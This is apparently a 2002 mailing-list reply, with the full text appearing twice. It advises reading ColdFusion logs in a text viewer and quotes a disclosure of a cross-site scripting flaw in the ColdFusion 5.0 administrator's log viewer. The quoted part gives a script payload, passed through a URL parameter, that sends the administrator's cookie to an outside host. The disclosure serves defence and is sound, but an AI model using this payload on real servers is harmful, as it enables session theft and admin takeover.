The 'view admin log' feature in CF tends to cause stress on the CF
process, and also blocks the log file during opening.
So, It's generally a better (and safer, with this cross-site scripting
problem that's been around for years) to view the logs file via a text
viewer on the sytem.
By default, it's c:\cfusion\log\*.log
On Mon, 16 Dec 2002, KiLL CoLe wrote:
> Cross-site scripting vulnerability in CF 5.0. This
> issue was brought up to macromedia on July 22nd, 2002.
> Macromedia issued a fix to me, but I have not seen the
> fix available to the public. the coldfusion
> administrator allows you to view your application log
> via your web browser. Under certain conditions, it is
> possible to remotely alter coldfusions application
> log. take the following code:
>
> <CFQUERY NAME="qProducts" DATASOURCE="#datasrc#">
> SELECT * FROM Products
> Where ProductId = #int(url.productid)#
> </CFQUERY>
>
> if the INT function encounters a value that is not
> numeric, it throws an exception and writes the value
> that was passed to application.log. Should an
> unsuspecting administrator view the log file via their
> web browser, script could be executed. Analyze this
> code:
> if url.productid (from the above example) were passed
> in as:
>
> <iframe name="frame1" width="0" height="0"></iframe>
> <script>document.frame1.location="http://www.domain.com/index.cfm?stealc
ookie="
> + document.cookie</script>
>
> this would enable an attacker to steal the value of
> the coldfusion administrators cookie. Decrypting the
> coldfusion admin's password is well documented, and
> exposes a mild-moderate threat to server security.
>
> **NOTE: there are dozens of other functions that throw
> exceptions similar to the INT function.
>
> __________________________________________________
> Do you Yahoo!?
> Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
> http://mailplus.yahoo.com
>
>
The 'view admin log' feature in CF tends to cause stress on the CF
process, and also blocks the log file during opening.
So, It's generally a better (and safer, with this cross-site scripting
problem that's been around for years) to view the logs file via a text
viewer on the sytem.
By default, it's c:\cfusion\log\*.log
On Mon, 16 Dec 2002, KiLL CoLe wrote:
> Cross-site scripting vulnerability in CF 5.0. This
> issue was brought up to macromedia on July 22nd, 2002.
> Macromedia issued a fix to me, but I have not seen the
> fix available to the public. the coldfusion
> administrator allows you to view your application log
> via your web browser. Under certain conditions, it is
> possible to remotely alter coldfusions application
> log. take the following code:
>
> <CFQUERY NAME="qProducts" DATASOURCE="#datasrc#">
> SELECT * FROM Products
> Where ProductId = #int(url.productid)#
> </CFQUERY>
>
> if the INT function encounters a value that is not
> numeric, it throws an exception and writes the value
> that was passed to application.log. Should an
> unsuspecting administrator view the log file via their
> web browser, script could be executed. Analyze this
> code:
> if url.productid (from the above example) were passed
> in as:
>
> <iframe name="frame1" width="0" height="0"></iframe>
> <script>document.frame1.location="http://www.domain.com/index.cfm?stealc
ookie="
> + document.cookie</script>
>
> this would enable an attacker to steal the value of
> the coldfusion administrators cookie. Decrypting the
> coldfusion admin's password is well documented, and
> exposes a mild-moderate threat to server security.
>
> **NOTE: there are dozens of other functions that throw
> exceptions similar to the INT function.
>
> __________________________________________________
> Do you Yahoo!?
> Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
> http://mailplus.yahoo.com
>
>
[ reply ]